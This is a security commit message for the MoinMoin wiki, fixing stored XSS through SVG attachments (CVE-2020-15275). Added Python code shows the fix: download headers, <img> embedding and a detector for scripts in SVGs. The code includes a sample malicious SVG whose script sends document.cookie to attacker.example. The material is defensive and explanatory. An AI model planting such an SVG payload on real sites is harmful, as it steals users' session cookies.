security: fix stored XSS vulnerability via SVG attachment
Fixes CVE-2020-15275. An attacker with write permissions can upload an SVG file that contains malicious JavaScript. This JavaScript will be executed in a user's browser when the user is viewing that SVG file on the wiki.

Components of this fix:

A) Add the SVG mimetype to the XSS-endangered types. SVG can contain JavaScript and lead to stored XSS. It seems the only exception to that is when using it in an <img> tag as src.

B) Add svg+xml to the browser-supported image types. This triggers that moin will use the <img> tag for SVGs. <img> does not have the SVG XSS issue.

Credits: This vulnerability was discovered by Catarina Leite from the Checkmarx SCA AppSec team.
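The two fix components above, as an added illustration in Python (MoinMoin's language) that is not the project's own code: a constructed SVG carrying a script and an onload handler, a hypothetical serve_headers() that forces a download for XSS-endangered types when the raw attachment is fetched, a hypothetical embed_markup() that emits an <img> tag for browser-supported image types, and a small checker that detects active content in an uploaded SVG. The type lists and function names are assumptions for this example; MoinMoin maintains its own lists, which are not reproduced here.

```python
"""Illustration (not MoinMoin's own code) of the two fix components in the
commit message: treat image/svg+xml as XSS-endangered when the raw file is
served, and embed SVG via <img>, which does not run scripts in the image."""
import html
import xml.etree.ElementTree as ET

# Constructed sample payload. Opened directly or rendered inline, a browser
# would run both the onload handler and the <script>; referenced as <img src>
# the SVG is treated as a static image and neither executes.
MALICIOUS_SVG = b"""<?xml version="1.0"?>
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <circle cx="20" cy="20" r="10"/>
</svg>"""

# Hypothetical type lists (assumption: MoinMoin keeps its own, not copied here).
XSS_ENDANGERED_TYPES = {"text/html", "application/xhtml+xml", "image/svg+xml"}
BROWSER_SUPPORTED_IMAGE_TYPES = {"image/png", "image/gif", "image/jpeg", "image/svg+xml"}


def serve_headers(mimetype):
    """Headers for sending the raw attachment: XSS-endangered types are
    delivered as a download so the browser never renders them in the wiki's
    origin; nosniff stops the browser from second-guessing the type."""
    headers = {"Content-Type": mimetype, "X-Content-Type-Options": "nosniff"}
    if mimetype in XSS_ENDANGERED_TYPES:
        headers["Content-Disposition"] = "attachment"
    else:
        headers["Content-Disposition"] = "inline"
    return headers


def embed_markup(url, mimetype):
    """Markup for embedding an attachment in a page: <img> for browser-supported
    image types (scripts inside an <img> SVG do not run), a plain link otherwise."""
    safe = html.escape(url, quote=True)
    if mimetype in BROWSER_SUPPORTED_IMAGE_TYPES:
        return '<img src="%s" alt="%s" />' % (safe, safe)
    return '<a href="%s">%s</a>' % (safe, safe)


SVG_NS = "{http://www.w3.org/2000/svg}"


def svg_has_active_content(data):
    """Upload-time check: True if the SVG contains a <script> element, an on*
    event attribute, or a javascript: URL anywhere in the document."""
    root = ET.fromstring(data)
    for el in root.iter():
        if el.tag in (SVG_NS + "script", "script"):
            return True
        for name, value in el.attrib.items():
            if name.lower().startswith("on"):
                return True
            if value.strip().lower().startswith("javascript:"):
                return True
    return False


if __name__ == "__main__":
    print(serve_headers("image/svg+xml"))
    print(embed_markup("/wiki/Page?action=AttachFile&do=get&target=logo.svg", "image/svg+xml"))
    print("active content:", svg_has_active_content(MALICIOUS_SVG))
```

The checker is a defence-in-depth addition rather than a substitute for the two fix components: an SVG can also pull in script through external references, so serving the file as a download and embedding it only through <img> remain the controls that actually close the stored XSS.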